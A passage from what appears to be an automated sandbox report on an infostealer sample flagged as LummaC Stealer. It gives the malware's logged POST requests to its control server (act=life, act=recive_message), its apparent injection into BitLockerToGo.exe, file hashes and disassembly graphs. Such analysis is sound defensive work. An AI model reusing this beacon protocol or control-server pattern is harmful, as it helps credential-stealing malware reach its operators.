                                                                                                                                                                                      Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      9192.168.2.549751104.21.53.84433748C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-12 23:44:24 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                      Host: sergei-esenin.com
                                                                                                                                                                                      2024-10-12 23:44:24 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                      2024-10-12 23:44:24 UTC553INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 12 Oct 2024 23:44:24 GMT
                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SDAqIrp6r2B9K%2B7a60zwirDHrJcRylrSwGHP1WoZDv4Q%2BtCw4ryNUyRoG6IKCqjoOtXzW8aMsxKdMqF50X0oor2oReVCKyDgiN9WdE0BvwcmL71V7xWYsa4W3Fmj2PSbru%2B0tw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                      CF-RAY: 8d1af5280bd70f8b-EWR
                                                                                                                                                                                      2024-10-12 23:44:24 UTC816INData Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                                                      Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                                                      2024-10-12 23:44:24 UTC1369INData Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f
                                                                                                                                                                                      Data Ascii: s/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('co
                                                                                                                                                                                      2024-10-12 23:44:24 UTC1369INData Raw: 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70
                                                                                                                                                                                      Data Ascii: ement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <inp
                                                                                                                                                                                      2024-10-12 23:44:24 UTC887INData Raw: 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61
                                                                                                                                                                                      Data Ascii: <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="bra
                                                                                                                                                                                      2024-10-12 23:44:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      10192.168.2.549757104.21.53.84433748C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2024-10-12 23:44:24 UTC354OUTPOST /api HTTP/1.1
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                      Cookie: __cf_mw_byp=7dVCApaVSuJAHxS2hly8AvsgLmmtzBWUGr_DufxF.Bw-1728776664-0.0.1.1-/api
                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                      Content-Length: 75
                                                                                                                                                                                      Host: sergei-esenin.com
                                                                                                                                                                                      2024-10-12 23:44:24 UTC75OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 32 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63
                                                                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=tLYMe5--2&j=5c9b8674a630d9101b46733aa37f15ec
                                                                                                                                                                                      2024-10-12 23:44:25 UTC829INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 12 Oct 2024 23:44:25 GMT
                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Set-Cookie: PHPSESSID=e924ihhgsiklj3if2tbjp3ktkj; expires=Wed, 05 Feb 2025 17:31:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=plseIaBzMv9Uk7BfI1yI5%2BCEgt%2FNJweyYlhD71ra2sOiSsT53AAZyjm2rLkg0qB0FrA2QG7NE5%2FMUfd8qc6jMt9Eyl6QZW2XJ9%2FF0Y4unbXzlUhrzZD0lY18M6BBTinRqBmd4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                      CF-RAY: 8d1af52c8e900f97-EWR
                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                      2024-10-12 23:44:25 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                      Data Ascii: aerror #D12
                                                                                                                                                                                      2024-10-12 23:44:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                      Statistics

                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                      Behavior

                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                      System Behavior

                                                                                                                                                                                      General

                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                      Start time:19:43:57
                                                                                                                                                                                      Start date:12/10/2024
                                                                                                                                                                                      Path:C:\Users\user\Desktop\Setup-Premium.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Setup-Premium.exe"
                                                                                                                                                                                      Imagebase:0x450000
                                                                                                                                                                                      File size:22'590'464 bytes
                                                                                                                                                                                      MD5 hash:65AB8081D6A7F813A39BD06052FA5887
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2173525211.00000000029BF000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      General

                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                      Start time:19:44:05
                                                                                                                                                                                      Start date:12/10/2024
                                                                                                                                                                                      Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                                      Imagebase:0x790000
                                                                                                                                                                                      File size:231'736 bytes
                                                                                                                                                                                      MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Disassembly

                                                                                                                                                                                      Reset < >

                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                        Execution Coverage:2.4%
                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                        Signature Coverage:29.2%
                                                                                                                                                                                        Total number of Nodes:106
                                                                                                                                                                                        Total number of Limit Nodes:8
                                                                                                                                                                                        execution_graph 18232 40f9c2 18233 40f850 18232->18233 18235 40f887 18232->18235 18233->18235 18236 43fec0 18233->18236 18237 43ff57 18236->18237 18238 43feea RtlReAllocateHeap 18236->18238 18239 43fedc 18236->18239 18240 43ff4c 18236->18240 18243 43daf0 18237->18243 18238->18240 18239->18237 18239->18238 18240->18235 18244 43db05 18243->18244 18245 43db09 18243->18245 18244->18240 18245->18245 18246 43db34 RtlFreeHeap 18245->18246 18246->18240 18247 4409e6 18248 440a20 18247->18248 18248->18248 18249 440abe 18248->18249 18251 43ff80 LdrInitializeThunk 18248->18251 18251->18249 18252 443380 18254 4433a0 18252->18254 18253 4434ce 18254->18253 18256 43ff80 LdrInitializeThunk 18254->18256 18256->18253 18257 440520 18258 44052a 18257->18258 18261 44068e 18258->18261 18264 43ff80 LdrInitializeThunk 18258->18264 18260 4407fe 18261->18260 18263 43ff80 LdrInitializeThunk 18261->18263 18263->18260 18264->18261 18265 43a346 CoSetProxyBlanket 18266 440343 18267 440350 18266->18267 18268 44048e 18267->18268 18272 43ff80 LdrInitializeThunk 18267->18272 18273 43ff80 LdrInitializeThunk 18268->18273 18271 440ad2 18272->18268 18273->18271 18274 43a2ca 18275 43a300 18274->18275 18275->18275 18276 43a30a SysAllocString 18275->18276 18277 43a336 18276->18277 18278 43a36a 18279 43a390 18278->18279 18279->18279 18280 43a3bc SysAllocString 18279->18280 18281 43a450 18280->18281 18281->18281 18282 43a482 SysAllocString 18281->18282 18283 43a4ad 18282->18283 18284 43a887 SysFreeString 18283->18284 18285 43a50e VariantInit 18283->18285 18286 43a88e SysFreeString 18283->18286 18287 43a798 VariantClear 18283->18287 18288 43a5bc SysStringLen 18283->18288 18289 43a89b SysFreeString 18283->18289 18292 43a750 18283->18292 18296 43a7b0 18283->18296 18302 43a5e6 18283->18302 18284->18286 18291 43a570 18285->18291 18286->18289 18287->18296 18288->18302 18298 43a8b3 SysFreeString 18289->18298 18290 43a9df 18293 43daf0 RtlFreeHeap 18290->18293 18291->18284 18291->18286 18291->18287 18291->18288 18291->18289 18291->18291 18291->18292 18291->18296 18301 43a944 18291->18301 18291->18302 18303 43a9e5 18293->18303 18294 43a9be 18294->18290 18308 43de30 18294->18308 18312 43dcf0 18294->18312 18316 43deb0 18294->18316 18296->18284 18296->18290 18296->18292 18296->18294 18300 43a8df GetVolumeInformationW 18296->18300 18296->18301 18298->18296 18300->18290 18300->18292 18300->18294 18300->18296 18300->18301 18301->18294 18307 43ff80 LdrInitializeThunk 18301->18307 18302->18284 18302->18286 18302->18287 18302->18289 18302->18290 18302->18292 18302->18294 18302->18296 18302->18301 18303->18292 18306 43ff80 LdrInitializeThunk 18303->18306 18306->18292 18307->18294 18309 43de7e 18308->18309 18310 43de36 18308->18310 18309->18294 18310->18309 18324 43ff80 LdrInitializeThunk 18310->18324 18313 43dd8e 18312->18313 18314 43dd01 18312->18314 18313->18294 18314->18313 18325 43ff80 LdrInitializeThunk 18314->18325 18317 43df28 18316->18317 18318 43dec6 18316->18318 18317->18294 18318->18317 18321 43df1e 18318->18321 18326 43ff80 LdrInitializeThunk 18318->18326 18320 43e04e 18320->18317 18320->18320 18328 43ff80 LdrInitializeThunk 18320->18328 18321->18320 18327 43ff80 LdrInitializeThunk 18321->18327 18324->18309 18325->18313 18326->18321 18327->18320 18328->18317 18337 40ccf0 18338 40ccfc 18337->18338 18339 40cd04 IsUserAnAdmin 18338->18339 18340 40cebf ExitProcess 18338->18340 18341 40cd0f 18339->18341 18342 40cd17 GetInputState 18341->18342 18343 40ceba 18341->18343 18344 40cd40 18342->18344 18352 43fea0 18343->18352 18344->18344 18346 40cd54 GetCurrentThreadId GetCurrentProcessId 18344->18346 18347 40cd80 18346->18347 18347->18343 18351 410ed0 CoInitialize 18347->18351 18355 4415d0 18352->18355 18354 43fea5 FreeLibrary 18354->18340 18356 4415d9 18355->18356 18356->18354 18357 410ef1 CoInitializeSecurity 18358 43dad2 RtlAllocateHeap 18359 410f13 18365 43a1b0 18359->18365 18367 43a210 18365->18367 18366 43a272 CoCreateInstance 18366->18366 18366->18367 18367->18366 18368 4400f7 18369 440100 GetForegroundWindow 18368->18369 18370 440113 18369->18370 18371 440892 18372 440894 18371->18372 18375 43ff80 LdrInitializeThunk 18372->18375 18374 440ad2 18375->18374

                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                        Function 0043A36A Relevance: 23.3, APIs: 10, Strings: 3, Instructions: 575memoryCOMMON
                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 0 43a36a-43a38f 1 43a390-43a3ba 0->1 1->1 2 43a3bc-43a441 SysAllocString 1->2 3 43a450-43a480 2->3 3->3 4 43a482-43a4b2 SysAllocString 3->4 6 43a887-43a888 SysFreeString 4->6 7 43a4c6-43a4e2 4->7 8 43a76b-43a774 4->8 9 43a50e-43a568 VariantInit 4->9 10 43a88e-43a88f SysFreeString 4->10 11 43a78c-43a795 call 40c570 4->11 12 43a752-43a764 4->12 13 43a7b0-43a7ba 4->13 14 43a750 4->14 15 43a77b-43a782 4->15 16 43a4b9 4->16 17 43a798-43a7ac VariantClear 4->17 18 43a5bc-43a5e4 SysStringLen 4->18 6->10 40 43a4e6-43a507 7->40 8->6 8->8 8->10 8->11 8->12 8->14 8->15 8->17 19 43a803 8->19 20 43a900-43a907 8->20 21 43a7c0-43a7d2 8->21 22 43a7e0-43a7e9 8->22 23 43a860-43a86d 8->23 24 43a806-43a82b call 432f30 8->24 25 43a944-43a96f call 43da60 8->25 26 43aaea-43ab43 call 43dcd0 call 43dcf0 8->26 27 43ab4a-43ab61 call 43deb0 8->27 28 43aaac-43aabe 8->28 29 43a7f0-43a7fc 8->29 30 43aad0 8->30 31 43a874-43a880 8->31 32 43a89b-43a8f9 SysFreeString * 2 call 442960 GetVolumeInformationW 8->32 33 43a9df-43a9fb call 43daf0 8->33 34 43a93d-43a93f 8->34 35 43a570-43a584 9->35 10->32 11->17 12->6 12->8 12->10 12->11 12->15 12->17 12->19 12->20 12->21 12->22 12->23 12->24 12->25 12->26 12->27 12->28 12->29 12->30 12->31 12->32 12->33 12->34 13->21 15->11 16->7 17->13 37 43a622 18->37 38 43a5e6-43a5ea 18->38 19->24 21->19 21->20 21->22 21->23 21->24 21->25 21->26 21->27 21->28 21->29 21->30 21->31 21->33 21->34 22->19 22->23 22->24 22->25 22->26 22->27 22->28 22->29 22->30 22->31 22->33 22->34 23->23 23->25 23->26 23->27 23->28 23->30 23->31 23->33 23->34 61 43a830-43a837 24->61 62 43a970-43a993 25->62 26->27 26->30 47 43aad2-43aae3 call 43de30 27->47 28->26 28->27 28->30 28->33 29->19 29->23 29->24 29->25 29->26 29->27 29->28 29->30 29->31 29->33 29->34 30->47 31->6 31->19 31->20 31->22 31->23 31->24 31->25 31->26 31->27 31->28 31->29 31->30 31->31 31->33 31->34 32->19 32->20 32->21 32->22 32->23 32->24 32->25 32->26 32->27 32->28 32->29 32->30 32->31 32->33 32->34 66 43aa00-43aa23 33->66 41 43aa6f-43aa76 34->41 35->35 43 43a586-43a59b 35->43 46 43a624-43a652 call 40c560 37->46 44 43a5fa-43a5fe 38->44 40->6 40->8 40->9 40->10 40->11 40->12 40->13 40->14 40->15 40->17 40->18 40->32 63 43a59f-43a5b5 43->63 44->46 60 43a600-43a61c 44->60 71 43a728-43a73f 46->71 72 43a658-43a660 46->72 47->26 47->27 47->30 47->33 64 43a61e-43a620 60->64 65 43a5ec-43a5f8 60->65 61->61 73 43a839-43a853 61->73 62->62 76 43a995-43a9a1 62->76 63->6 63->8 63->10 63->11 63->12 63->14 63->15 63->17 63->18 63->19 63->20 63->21 63->22 63->23 63->24 63->25 63->29 63->31 63->32 63->34 64->65 65->44 65->46 66->66 70 43aa25-43aa2d 66->70 80 43aa6a-43aa6d 70->80 81 43aa2f-43aa3b 70->81 71->6 71->8 71->10 71->11 71->12 71->14 71->15 71->17 71->19 71->20 71->21 71->22 71->23 71->24 71->25 71->26 71->28 71->29 71->30 71->31 71->32 71->33 71->34 72->71 82 43a666-43a674 72->82 73->23 73->25 73->26 73->27 73->28 73->30 73->31 73->33 73->34 78 43a9a3-43a9ab 76->78 79 43a9cc-43a9d8 76->79 86 43a9b0-43a9b7 78->86 79->26 79->27 79->28 79->30 79->33 80->41 83 43aa40-43aa47 81->83 84 43a677-43a67e 82->84 89 43aa50-43aa56 83->89 90 43aa49-43aa4c 83->90 84->71 91 43a684-43a688 84->91 87 43a9c0-43a9c6 86->87 88 43a9b9-43a9bc 86->88 87->79 92 43aa77-43aaa5 call 43ff80 87->92 88->86 97 43a9be 88->97 89->80 96 43aa58-43aa67 call 43ff80 89->96 90->83 93 43aa4e 90->93 94 43a695-43a6a7 91->94 95 43a68a-43a693 91->95 92->26 92->27 92->28 92->30 92->33 93->80 101 43a6d0-43a6de 94->101 102 43a6a9-43a6ae 94->102 100 43a710-43a717 95->100 96->80 97->79 100->71 105 43a719-43a722 100->105 101->100 104 43a6e0-43a709 101->104 102->101 103 43a6b0-43a6ce 102->103 103->100 104->100 105->71 105->84
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • SysAllocString.OLEAUT32 ref: 0043A3BD
                                                                                                                                                                                        • SysAllocString.OLEAUT32(29E12BF1), ref: 0043A487
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                        • String ID: fq$31$?=
                                                                                                                                                                                        • API String ID: 2525500382-1730420960
                                                                                                                                                                                        • Opcode ID: a087b76b6007693ddb1c91c83b0e85ed24a0484c0a7e75aa2847dbf52695ab82
                                                                                                                                                                                        • Instruction ID: b716dc9a5c64fcb2131b8ac4d81bec1305510a105ed9a4e7498d7370fe388f18
                                                                                                                                                                                        • Opcode Fuzzy Hash: a087b76b6007693ddb1c91c83b0e85ed24a0484c0a7e75aa2847dbf52695ab82
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1612DB79A083008FD714DF64D88576BBBE1FF8A314F14992DE4C6872A0D779D906CB8A
                                                                                                                                                                                        Function 00410F13 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 302COMMON
                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 108 410f13-410f3f call 43a1b0 111 410f40-410f7d 108->111 111->111 112 410f7f-410ff1 111->112 113 411000-411027 112->113 113->113 114 411029-41103a 113->114 115 41105b-411063 114->115 116 41103c-411043 114->116 118 411065-411066 115->118 119 41107b-411088 115->119 117 411050-411059 116->117 117->115 117->117 120 411070-411079 118->120 121 4110ab-4110b3 119->121 122 41108a-411091 119->122 120->119 120->120 124 4110b5-4110b6 121->124 125 4110cb-4111ff 121->125 123 4110a0-4110a9 122->123 123->121 123->123 126 4110c0-4110c9 124->126 127 411200-411239 125->127 126->125 126->126 127->127 128 41123b-41126b 127->128 129 411270-41129d 128->129 129->129 130 41129f-4112d7 call 40faa0 129->130 133 4112f2-4112fb call 403be0 130->133 134 4113a6-4113cb GetSystemDirectoryW 130->134 135 411419 130->135 136 4112de-4112eb 130->136 133->134 138 4113d2 134->138 139 4113cd-4113d0 134->139 136->133 136->135 141 4113d3-4113db 138->141 139->138 139->141 142 4113e2 141->142 143 4113dd-4113e0 141->143 144 4113e3-4113f0 call 40c560 call 43acb0 142->144 143->142 143->144 148 4113f5-411412 call 43daf0 144->148 148->133 148->135
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(Gw,00000104), ref: 004113AC
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: DirectorySystem
                                                                                                                                                                                        • String ID: A1D9BE3B5D88E0D2045F52AD438D4AB4$Gw$GuD$Uki$ls$r$sergei-esenin.com$us$}/{
                                                                                                                                                                                        • API String ID: 2188284642-836274848
                                                                                                                                                                                        • Opcode ID: dda5040fdb2ca2a9dae441a365facf5f6c35a24277052ba7b72f12c531d9f51e
                                                                                                                                                                                        • Instruction ID: a32376d71c9256b25324d82dfdb7a15c74f23a158ba34c891d3f40abae141963
                                                                                                                                                                                        • Opcode Fuzzy Hash: dda5040fdb2ca2a9dae441a365facf5f6c35a24277052ba7b72f12c531d9f51e
                                                                                                                                                                                        • Instruction Fuzzy Hash: 66A11EB458D3C08BD731CF2598A17EBBBE1AB9A344F0849ADC8C94B346D7390845CB97
                                                                                                                                                                                        Function 0043A1B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 187 43a1b0-43a201 188 43a210-43a224 187->188 188->188 189 43a226-43a243 188->189 191 43a272-43a2c3 CoCreateInstance 189->191 192 43a270 189->192 193 43a24a-43a263 189->193 191->191 191->192 191->193 192->191 193->192
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                        • API String ID: 0-336475711
                                                                                                                                                                                        • Opcode ID: dd91123ec59b87012b6a916223a51725615a3d43cf5a21b046aada3358be593a
                                                                                                                                                                                        • Instruction ID: ce9e5ec331c6781234e92e466d7e6817b8b4649f9c01226947f4e35f75938b71
                                                                                                                                                                                        • Opcode Fuzzy Hash: dd91123ec59b87012b6a916223a51725615a3d43cf5a21b046aada3358be593a
                                                                                                                                                                                        • Instruction Fuzzy Hash: B22165745583409FE320CF14D845B4BBBA4FB86354F00891CE1E89A281CBBA990ACF9B
                                                                                                                                                                                        Function 0043A2CA Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
